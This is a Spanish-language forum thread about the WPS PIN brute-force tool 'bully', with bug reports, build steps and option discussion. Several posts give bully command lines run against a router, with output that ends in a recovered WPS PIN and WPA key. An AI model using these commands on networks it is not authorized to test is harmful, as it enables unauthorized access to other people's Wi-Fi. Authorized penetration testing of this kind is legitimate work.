Autor Tema: BULLY: Mejoras, bugs, aclaraciones, etc.  (Leído 79947 veces)

0 Usuarios y 1 Visitante están viendo este tema.

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #20 en: 06-09-2013, 14:46 (Viernes) »
nice!
Brian is reading this thread.
thanks for testing, jar229!



bdpurcell

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #21 en: 07-09-2013, 04:54 (Sábado) »
Gracias por tomarse el tiempo para probar jar229! Buena noticia.

Tengo curiosidad, ¿alguien ha visto un problema con bully encontrar la primera mitad de la espiga, y después no cierre correctamente? Sería algo así:

...
[] Rx (M5) = 'Pin1Bad' Siguiente pin '50082803 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '33122809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '53302809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '01522808 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '45432804 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '49092806 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909953x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909612x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909054x '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '72832806 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '87562804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '38812804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '70212808 '
...

Finalmente diría "Agotada posibilidades primera media sin éxito", ya que no estaba cerrada correctamente en 4909xxxx. Caso raro, pero me pregunto si la gente ha visto.

Tengo el fin de semana, así que voy a estar trabajando en bully ampliamente.

Me gustaría decir que sin la retroalimentación de los usuarios y los profesionales como ustedes, matón sería un proyecto muerto. Gracias a todos, especialmente alister y jar229 por sus contribuciones.

Brian

Traducción proporcionada por Google

pedroram

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #22 en: 07-09-2013, 12:21 (Sábado) »
Una manera de obligarle a que haga el primer cuarteto de manera secuencial, es metiendole la opción -S -p 0XXX . Ese cuarteto lo toma como si fuesen el cero el ultimo digito del primer cuarteto y los otros tres digitos, como si fuesen parte del segundo cuarteto.

Funciona bastante mas rápido que el reaver, la verdad.

Desconectado jar229

  • Colaborador
  • *
  • Mensajes: 4604
Re: Re: BULLY para tontos | BULLY for dummies
« Respuesta #23 en: 07-09-2013, 13:51 (Sábado) »
Un placer, poder ayudar.

Si hay algún tipo de test que quieras que haga .. avisa ;D

Enviado desde mi CUBOT GT99 usando Tapatalk 4

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #24 en: 07-09-2013, 17:14 (Sábado) »
Gracias por tomarse el tiempo para probar jar229! Buena noticia.

Tengo curiosidad, ¿alguien ha visto un problema con bully encontrar la primera mitad de la espiga, y después no cierre correctamente? Sería algo así:

...
[] Rx (M5) = 'Pin1Bad' Siguiente pin '50082803 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '33122809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '53302809 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '01522808 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '45432804 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '49092806 '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909953x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909612x '
[] Rx (M5) = 'Pin2Bad' Siguiente pin '4909054x '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '72832806 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '87562804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '38812804 '
[] Rx (M5) = 'Pin1Bad' Siguiente pin '70212808 '
...

Finalmente diría "Agotada posibilidades primera media sin éxito", ya que no estaba cerrada correctamente en 4909xxxx. Caso raro, pero me pregunto si la gente ha visto.

Tengo el fin de semana, así que voy a estar trabajando en bully ampliamente.

Me gustaría decir que sin la retroalimentación de los usuarios y los profesionales como ustedes, matón sería un proyecto muerto. Gracias a todos, especialmente alister y jar229 por sus contribuciones.

Brian

Traducción proporcionada por Google

lo que pregunta brian es si hemos notado que no funciona el "lock" de la primera mitad del PIN. Es decir, despues de adivinar la primera mitad, sigue cambiando en lugar de mantenerla fija.

Personalmente, siempre me falla este aspecto del programa.

thanks to you, Brian, for coding bully and for listening to us. We are we can contribute to such valuable pentesting tool.
« Última modificación: 07-09-2013, 17:15 (Sábado) por alister »

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #25 en: 07-09-2013, 17:18 (Sábado) »
Una manera de obligarle a que haga el primer cuarteto de manera secuencial, es metiendole la opción -S -p 0XXX . Ese cuarteto lo toma como si fuesen el cero el ultimo digito del primer cuarteto y los otros tres digitos, como si fuesen parte del segundo cuarteto.

Funciona bastante mas rápido que el reaver, la verdad.
Estas seguro de esto?

teoricamente bully solo deberia aceptar el parámetro -p si el argumento tiene SIETE cifras, por ejemplo:
bully -S -p 0123456

ejecutando el comando que propones:
bully -S -p 0123
deberia arrojar un error

PD: quizas me equvoco? tendré que revisar el código de nuevo
« Última modificación: 07-09-2013, 17:19 (Sábado) por alister »

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15457
Re: BULLY para tontos | BULLY for dummies
« Respuesta #26 en: 08-09-2013, 04:11 (Domingo) »
revision svn 14

acepta pines ( siete primeros caracteres )

SOLO ES NECESARIO USAR    -p XXXXXXX    SIN MASSSSS


____________________________

I dont like the method to write de *.run file when get de PIN & KEY

# Do Not Modify
# 'ESSID' (XX:XX:XX:XX:XX:XX)
# session ended 2013-09-08 03:55:34 with signal 0
8XXXXXX:8XXXXXX:i4Ag26riFBXXXXXXXXXX:

I THNIK 3 THINGS

Why only 7 digits pin  
Why write 2 times the pin ?
Is not better option separate parts ?

Like that like this  ;D

PIN = 8XXXXXXX  -->> ENTIRELY
KEY = XXXXXXXXXXXXX


some like this ...

# Do Not Modify
# 'ESSID' (XX:XX:XX:XX:XX:XX)
# session ended 2013-09-08 03:55:34 with signal 0
PIN = XXXXXXXX
KEY = XXXXXXXXXXXXXXXXXXX




« Última modificación: 08-09-2013, 04:11 (Domingo) por USUARIONUEVO »

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15457
Re: BULLY para tontos | BULLY for dummies
« Respuesta #27 en: 08-09-2013, 04:18 (Domingo) »
Actualizando bully desde svn a ultimas versiones.


Código: [Seleccionar]
svn checkout http://bully.googlecode.com/svn/trunk/ bully-read-only
Código: [Seleccionar]
cd ~/bully-read-only/src
Código: [Seleccionar]
make

El siguiente paso logico seria make install , pero como wifislax tiene el binario en /usr/bin  ..lo moveremos en vez de instalarlo.

Código: [Seleccionar]
mv bully /usr/bin/bully
Y ahora limpiaremos , por que ya lo hemos instalado

Código: [Seleccionar]
cd ~
Código: [Seleccionar]
rm -Rf ~/bully*

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15457
Re: BULLY para tontos | BULLY for dummies
« Respuesta #28 en: 08-09-2013, 07:29 (Domingo) »
Bully svn 14 , aparently FIX , correctly de 4 first digits ....

and parameter -p XXXXXXX  works well ... 1 attent and get wpa key




« Última modificación: 08-09-2013, 07:39 (Domingo) por USUARIONUEVO »

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #29 en: 09-09-2013, 10:23 (Lunes) »
@USUARIONUEVO:

dado que brian está ya registrado en el foro y leyendo este hilo, le dejo que te responda a tus observaciones, pero básicamente estamos todos pensando y observando lo mismo.
PD: el tema de los 7 digitos en el pin, ya está previsto que se cambiará permitir 8 y así facilitar el ataque a routers no estandar
__
provided that brian is registered at this forum and reading this thread already, I let him answer to your observations, but we are basically thinking and noticing the same.
PS: regarding the 7 digit only pin, changing to allow 8 digits that's already on the roadmap in order to ease attacking non fully WPS compliant APs


alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #30 en: 09-09-2013, 10:25 (Lunes) »
Actualizando bully desde svn a ultimas versiones.
Código: [Seleccionar]
rm -Rf ~/bully*

rm -Rf ~/.bully*

dont forget that dot :- P


EPIC FAIL
sorry
« Última modificación: 09-09-2013, 12:01 (Lunes) por alister »

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15457
Re: BULLY para tontos | BULLY for dummies
« Respuesta #31 en: 09-09-2013, 11:49 (Lunes) »
Actualizando bully desde svn a ultimas versiones.
Código: [Seleccionar]
rm -Rf ~/bully*

rm -Rf ~/.bully*

dont forget that dot :- P

FAIL melón ...si haces eso ue tu pones ...eliminas el directorio donde bully te guarda los *.run

la idea de  rm -Rf ~/bully*

es simple y llanamente eliminar el code bajado por svn en la carpeta bully-read-only

lo que pasa que para no escribir todo el name..dije, pue sasterisco y acabo antes.

Lo correcto habría sido


rm -Rf ~/bully-read-aonly

Pero los pasos que puse están perfectos, ya que lo fui pasando por Shell y copiando directamente al post-

De todas maneras tu mismo ya te habrá dao cuenta ...  ¿ para que quiero borrar la carpeta de config de bully con mis ataques a medias etc ?

La idea es solo borrar lo bajado del svn ,el source.  ^-^

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #32 en: 09-09-2013, 12:01 (Lunes) »
ah, cierto. no capté la idea de tu comando.
me hago el harakiri y vuelvo xD

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15457
Re: BULLY para tontos | BULLY for dummies
« Respuesta #33 en: 09-09-2013, 12:23 (Lunes) »
ah, cierto. no capté la idea de tu comando.
me hago el harakiri y vuelvo xD


Es normal , no semos maquinas.

Pero que nadie elimine

.bully ..por que iran a tu casa a buscarte  ;D

sobretodo si tienen algún atauqe a medias,con un par de horas hechadas...jajaja  >:D

manuelacantasaetas

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #34 en: 11-09-2013, 00:57 (Miércoles) »
[Pregunta tonta:

¿Como saber si el WPS esta activado sin tener el router delante?



Código: [Seleccionar]
wash  ^-^
« Última modificación: 11-09-2013, 01:02 (Miércoles) por Blackleg »

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #35 en: 11-09-2013, 01:18 (Miércoles) »
[Pregunta tonta:

¿Como saber si el WPS esta activado sin tener el router delante?



Código: [Seleccionar]
wash  ^-^


ya te iba a empalar con una caña rota! jajajaja

manuelacantasaetas

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #36 en: 11-09-2013, 13:21 (Miércoles) »
[Pregunta tonta:

¿Como saber si el WPS esta activado sin tener el router delante?



Código: [Seleccionar]
wash  ^-^


ya te iba a empalar con una caña rota! jajajaja

Ya le podías sacar punta, que me lo merecía.

SpanishGroove

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #37 en: 11-09-2013, 16:54 (Miércoles) »
T.T

pedroram

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #38 en: 11-09-2013, 21:47 (Miércoles) »
Una manera de obligarle a que haga el primer cuarteto de manera secuencial, es metiendole la opción -S -p 0XXX . Ese cuarteto lo toma como si fuesen el cero el ultimo digito del primer cuarteto y los otros tres digitos, como si fuesen parte del segundo cuarteto.

Funciona bastante mas rápido que el reaver, la verdad.
Estas seguro de esto?

teoricamente bully solo deberia aceptar el parámetro -p si el argumento tiene SIETE cifras, por ejemplo:
bully -S -p 0123456

ejecutando el comando que propones:
bully -S -p 0123
deberia arrojar un error

PD: quizas me equvoco? tendré que revisar el código de nuevo

Si. fue con la version 4.6 de wifislax instalada en HDD, con la version 1.3 de bully.

Despues intenté compilar la 1.4, y me dió este error el bully. He bajado la ultima ISO la he instalado en HDD y me sigue dando el mismo error (variando la frecuencia)

wifislax ~ # bully -e xxxxxxxxxxx -S -p 0123 mon0
[X] Unknown frequency '2422' reported by interface 'mon0'
wifislax ~ #

==========================================================

Por abrir la bocaza.....

wifislax ~ # bully -e xxxxxxxxXXXX -c 3 -S -p 0123 mon0
  • Switching interface 'mon0' to channel '3'
  • [!] Using 'XX:XX:XX:XX:XX:XX'  for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'xxxxxxxxXXXX' on channel '3'
  • Got beacon for 'xxxxxxxxXXXX' (XX:XX:XX:XX:XX:XX)
  • Index of starting pin number is '0000123'
  • Last State = 'NoAssoc'   Next pin '00001236'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00011235'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00021234'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00031233'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00041232'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00051231'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00061230'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00071239'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00081238'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00091237'
  • Rx(  M5  ) = 'Pin1Bad'   Next pin '00101233'

^C
Saved session to '/root/.bully/XX:XX:XX:XX:XX:XX.run'

wifislax ~ # bully -e xxxxxxxxXXXX -c 3 -S -p XXXXXX0 mon0
  • Switching interface 'mon0' to channel '3'
  • [!] Using 'XX:XX:XX:XX:XX:XX' for the source MAC address
  • Datalink type set to '127', radiotap headers present
  • Scanning for beacon from 'xxxxxxxxXXXX' on channel '3'
  • Got beacon for 'xxxxxxxxXXXX' (XX:XX:XX:XX:XX:XX)
  • [!] Restoring session from '/root/.bully/XX:XX:XX:XX:XX:XX.run'
  • Index of starting pin number is 'XXXXXX0'
  • Last State = 'NoAssoc'   Next pin 'XXXXXX04'
  • Rx(  M7  ) = 'Pin2Bad'   Next pin 'XXXXXX11'
  • Rx(  M7  ) = 'Pin2Bad'   Next pin 'ZZZZZZZZ'
  • Pin is '15782328', key is 'XXXXXXXX'

Saved session to '/root/.bully/XX:XX:XX:XX:XX:XX.run'

   PIN : 'ZZZZZZZZ'
   KEY : 'XXXXXXXX'


« Última modificación: 11-09-2013, 22:06 (Miércoles) por pedroram »

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #39 en: 11-09-2013, 22:01 (Miércoles) »
nueva version de bully con soporte para routers que incumplen el checksum de WPS PIN (véase el ASL-26555 de movistar)

Brian ha añadido una nueva opción "-B" para habilitar este modo de operación que hace exactamente lo mismo que hacian las diferentes modificaciones del reaver que diferentes investigadores realizaron previamente (véase el "reaver wifislax" y el reaver modificado por notepad).

Citar
  -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]

para descargarlo:
Código: [Seleccionar]
git clone https://github.com/bdpurcell/bully.git

@pedro
prueba esta la version nueva de bully con la ultima de wifislax y nos cuentas. aunque tiene pinta de que tu problema es otro.